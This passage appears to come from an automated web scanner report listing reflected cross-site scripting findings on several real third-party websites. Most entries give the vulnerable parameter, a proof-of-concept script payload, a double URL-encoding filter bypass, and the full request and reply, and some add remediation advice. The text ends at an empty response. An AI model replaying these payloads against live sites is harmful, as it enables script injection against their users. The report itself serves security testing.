GET /solr/select/?callback=jsonp1313106315813&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallerya1818<script>alert(1)</script>aed90a4ab72&start=0&rows=3&indent=on&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess HTTP/1.1 Host: content.bestbuyon.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.bestbuy.com/
Response
HTTP/1.1 200 OK Server: Apache/2.2.12 (Ubuntu) Last-Modified: Thu, 11 Aug 2011 21:11:00 GMT ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI=" Vary: Accept-Encoding Content-Type: text/plain;charset=UTF-8 Content-Length: 756 Date: Thu, 11 Aug 2011 23:44:31 GMT Connection: close
bbyon.ajaxReturnTaxonometricSuccess({ "responseHeader":{ "status":0, "QTime":1, "params":{ "json.wrf":"bbyon.ajaxReturnTaxonometricSuccess", "fl":"title,type,ss_type,ss_feature_desc,sis_field ...[SNIP]... ail,created", "sort":"sis_field_dotcom_slot asc,sis_field_yellow_tag_rating desc,created desc", "indent":"on", "start":"0", "q":"-tid:1487 AND tid:1630 AND ss_type:kaltura_entry2 OR ss_type:gallerya1818<script>alert(1)</script>aed90a4ab72", "callback":"jsonp1313106315813", "qt":"standard", "wt":"json", "rows":"3"}}, "response":{"numFound":0,"start":0,"docs":[] }})
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15082%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6008e264d60 was submitted in the REST URL parameter 5. This input was echoed as 15082"><script>alert(1)</script>6008e264d60 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2e2f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1cc3c2ed414 was submitted in the REST URL parameter 5. This input was echoed as f2e2f"><script>alert(1)</script>1cc3c2ed414 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of the Action request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3c09'%3balert(1)//4faa26409b6 was submitted in the Action parameter. This input was echoed as f3c09';alert(1)//4faa26409b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Action request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44839'%3balert(1)//c075691c24c was submitted in the Action parameter. This input was echoed as 44839';alert(1)//c075691c24c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /store?Action=DisplayContentManagerStyleSheet44839'%3balert(1)//c075691c24c&SiteID=adbevlus&StyleID=35830700&StyleVersion=17&styleIncludeFile=style.css HTTP/1.1 Host: drh.img.digitalriver.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://volumelicensing.adobe.com/store/adbevlus/en_US/pd/ProductID.230278700?af0f8--%3E%3Cscript%3Ealert(document.location)%3C/script%3Ebb99325cab5=1
Response
HTTP/1.1 200 OK Content-Type: text/html;charset=UTF-8 Last-Modified: Wed, 31 Aug 2011 13:16:04 GMT Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (M;max-age=86400+0;age=0;ecid=23501754707,0) Content-Length: 39650 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb03@dc1app77 Cache-Control: max-age=86400 Expires: Thu, 01 Sep 2011 13:16:04 GMT Date: Wed, 31 Aug 2011 13:16:04 GMT Connection: close Vary: Accept-Encoding
The value of the pt1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad198'-alert(1)-'f60f448d4b0 was submitted in the pt1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pt2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52654'-alert(1)-'99b1aa3f16d was submitted in the pt2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pt3 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b254c'-alert(1)-'3820416d3a8 was submitted in the pt3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the jsonsp request parameter is copied into the HTML document as plain text between tags. The payload aa7d0<script>alert(1)</script>09589a620ba was submitted in the jsonsp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Zvents_load_ZventsWidget1aa7d0<script>alert(1)</script>09589a620ba('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Stomp","id":175823405,"startTime":"Thu Aug 11 20:00:00 UTC 2011","endTime":null,"zurl":"/new-york-ny/events/show/175823405-stomp"},{"name" ...[SNIP]...
The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 67f36<script>alert(1)</script>5a44214f354 was submitted in the st parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Zvents_load_ZventsWidget1('callback({"rsp":{"status":"error","msg":"Invalid search: event67f365a44214f354 is not a valid search category.","content":{"next_page":false,"identifier": "st=event67f36<script>alert(1)</script>5a44214f354&when=today&ssi=0&srss=4"}}})')
The value of the image_size request parameter is copied into the HTML document as plain text between tags. The payload a2960<script>alert(1)</script>23d031d555e was submitted in the image_size parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Thu, 11 Aug 2011 22:35:35 GMT Content-Type: text/plain; charset=utf-8 Connection: keep-alive Status: 200 OK X-Rack-Cache: miss, store X-HTTP_CLIENT_IP_O: 50.23.123.106 Access-Control-Allow-Origin: * X-Runtime: 455 ETag: "2db2f2300aa255ecfb1ee8c22ab5041a" Z-DETECTED-FLAVOR: events_flavor | X-Content-Digest: b145210b425eb01eee94d1c7b06bfb5dc9c830e7 Z-REQUEST-HANDLED-BY: www28 Cache-Control: max-age=1800, public Set-Cookie: Age: 0 Content-Length: 2131
jsp_0('callback({"rsp":{"status":"ok","content":{"events":[{"name":"The Freedom Party NYC","has_tickets":false,"tickets_on_sale":null,"venue_id":861747,"id":199524386,"images":[{"url":"http://www.zvents.com/images/internal/5/4/7/5/img_11635745_thumba2960<script>alert(1)</script>23d031d555e.jpg?resample_method=scaled","height":null,"width":null}],"starttime":"Fri Aug 12 23:00:00 UTC 2011","zurl":"/new-york-ny/events/show/199524386-the-freedom-party-nyc"},{"name":"Pacha Teen Night with Dj ...[SNIP]...
The value of the jsonsp request parameter is copied into the HTML document as plain text between tags. The payload 8b9c9<script>alert(1)</script>deca5adb594 was submitted in the jsonsp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Thu, 11 Aug 2011 22:36:11 GMT Content-Type: text/plain; charset=utf-8 Connection: keep-alive Status: 200 OK X-Rack-Cache: miss, store X-HTTP_CLIENT_IP_O: 50.23.123.106 Access-Control-Allow-Origin: * X-Runtime: 92 ETag: "ef147786317863042bcdeb82556459d0" Z-DETECTED-FLAVOR: events_flavor | X-Content-Digest: be1188d01917925547700abedbea482ea7c8b840 Z-REQUEST-HANDLED-BY: www12 Cache-Control: max-age=1800, public Set-Cookie: Age: 0 Content-Length: 1958
jsp_08b9c9<script>alert(1)</script>deca5adb594('callback({"rsp":{"status":"ok","content":{"events":[{"name":"2011 Lincoln Center Out Of Doors: 28th Annual Roots of American Music Festival","has_tickets":false,"tickets_on_sale":null,"venue_id":2181 ...[SNIP]...
The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 6019a<script>alert(1)</script>64a6f8607b8 was submitted in the st parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the when request parameter is copied into the HTML document as plain text between tags. The payload d5cfb<script>alert(1)</script>2dd8a5df4aa was submitted in the when parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Thu, 11 Aug 2011 22:35:53 GMT Content-Type: text/plain; charset=utf-8 Connection: keep-alive Status: 200 OK X-Rack-Cache: miss, store X-HTTP_CLIENT_IP_O: 50.23.123.106 Access-Control-Allow-Origin: * X-Runtime: 19 ETag: "e3834b5cda8e7aef83a32aa6f27b09ac" Z-DETECTED-FLAVOR: events_flavor | X-Content-Digest: 19ae35a7fb298d27c4555c7da507d4f846376446 Z-REQUEST-HANDLED-BY: www30 Cache-Control: max-age=1800, public Set-Cookie: Age: 0 Content-Length: 476
{"rsp":{"status":"failed","msg":"Unrecognized date format: next 30 daysd5cfb<script>alert(1)</script>2dd8a5df4aa is not recognized as a valid time. Here are some examples of times that we recognize:<ul style='padding-left:15px;'> ...[SNIP]...
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 10742<script>alert(1)</script>b543d8110c0 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /m2/exacttarget/mbox/standard?mboxHost=www.exacttarget.com&mboxSession=1314893721327-888860&mboxPage=1314893721327-888860&screenHeight=1200&screenWidth=1920&browserWidth=1033&browserHeight=852&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=et_beta10742<script>alert(1)</script>b543d8110c0&mboxId=0&mboxTime=1314875721479&mboxURL=http%3A%2F%2Fwww.exacttarget.com%2F&mboxReferrer=http%3A%2F%2Fwww.iab.net%2Fsite_map&mboxVersion=40 HTTP/1.1 Host: exacttarget.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://www.exacttarget.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript Content-Length: 203 Date: Thu, 01 Sep 2011 16:15:53 GMT Server: Test & Target
The value of the count request parameter is copied into the HTML document as plain text between tags. The payload 63266<script>alert(1)</script>229a106f66a was submitted in the count parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v2/js/awsbuzz?title=AWS%20Buzz%20on%20Delicious&icon=rss&count=1063266<script>alert(1)</script>229a106f66a&sort=date HTTP/1.1 Host: feeds.delicious.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://aws.typepad.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Date: Sun, 02 Oct 2011 01:31:38 GMT Server: nginx/1.0.6 Content-Length: 751 Connection: keep-alive
The value of the icon request parameter is copied into the HTML document as plain text between tags. The payload 4bba2<script>alert(1)</script>aeadd697d46 was submitted in the icon parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v2/js/awsbuzz?title=AWS%20Buzz%20on%20Delicious&icon=rss4bba2<script>alert(1)</script>aeadd697d46&count=10&sort=date HTTP/1.1 Host: feeds.delicious.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://aws.typepad.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Date: Sun, 02 Oct 2011 01:31:36 GMT Server: nginx/1.0.5 Content-Length: 710 Connection: keep-alive
1.232. http://feeds.delicious.com/v2/js/awsbuzz [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://feeds.delicious.com
Path:
/v2/js/awsbuzz
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1d17a<script>alert(1)</script>2d39d680b48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v2/js/awsbuzz?title=AWS%20Buzz%20on%20Delicious&icon=rss&count=10&sort=date&1d17a<script>alert(1)</script>2d39d680b48=1 HTTP/1.1 Host: feeds.delicious.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://aws.typepad.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Date: Sun, 02 Oct 2011 01:31:43 GMT Server: nginx/1.0.5 Content-Length: 719 Connection: keep-alive
The value of the sort request parameter is copied into the HTML document as plain text between tags. The payload 7b7b2<script>alert(1)</script>b72a370e221 was submitted in the sort parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v2/js/awsbuzz?title=AWS%20Buzz%20on%20Delicious&icon=rss&count=10&sort=date7b7b2<script>alert(1)</script>b72a370e221 HTTP/1.1 Host: feeds.delicious.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://aws.typepad.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Date: Sun, 02 Oct 2011 01:31:41 GMT Server: nginx/1.0.6 Content-Length: 710 Connection: keep-alive
The value of the title request parameter is copied into the HTML document as plain text between tags. The payload 1299a<script>alert(1)</script>640aa9f4867 was submitted in the title parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v2/js/awsbuzz?title=AWS%20Buzz%20on%20Delicious1299a<script>alert(1)</script>640aa9f4867&icon=rss&count=10&sort=date HTTP/1.1 Host: feeds.delicious.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://aws.typepad.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Date: Sun, 02 Oct 2011 01:31:34 GMT Server: nginx/1.0.5 Content-Length: 710 Connection: keep-alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e72ac"-alert(1)-"9131707641a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dce72ac"-alert(1)-"9131707641a/10449/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=46E994820BEA60E036BF5BE397EDBBC0; Path=/ Content-Type: text/html Date: Thu, 11 Aug 2011 22:40:34 GMT Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10fb9"-alert(1)-"6e53e38484e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/1044910fb9"-alert(1)-"6e53e38484e/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=5469F15AA88EEE3255E56F24ACA66C81; Path=/ Content-Type: text/html Date: Thu, 11 Aug 2011 22:40:34 GMT Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44c9e"-alert(1)-"e76675c569d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10449/14581744c9e"-alert(1)-"e76675c569d/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html Date: Thu, 11 Aug 2011 22:40:35 GMT Connection: close
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac792"-alert(1)-"f774c7feed6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10449/145817/adiac792"-alert(1)-"f774c7feed6/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=49CCDDF0805E1F3B79B8DDA62CB254A9; Path=/ Content-Type: text/html Date: Thu, 11 Aug 2011 22:40:35 GMT Connection: close
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9e4b"-alert(1)-"80809c3de6e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10449/145817/adi/N5823.InterCLICKc9e4b"-alert(1)-"80809c3de6e/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=77AF6CFE5EC6234805A7DAAF7F27D4BF; Path=/ Content-Type: text/html Date: Thu, 11 Aug 2011 22:40:36 GMT Connection: close
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c076e"-alert(1)-"297be020030 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5c076e"-alert(1)-"297be020030;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=D7490E4F1316D12659D2939747B9E325; Path=/ Content-Type: text/html Date: Thu, 11 Aug 2011 22:40:35 GMT Connection: close
1.241. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acf01"-alert(1)-"2215212b286 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898?&acf01"-alert(1)-"2215212b286=1 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
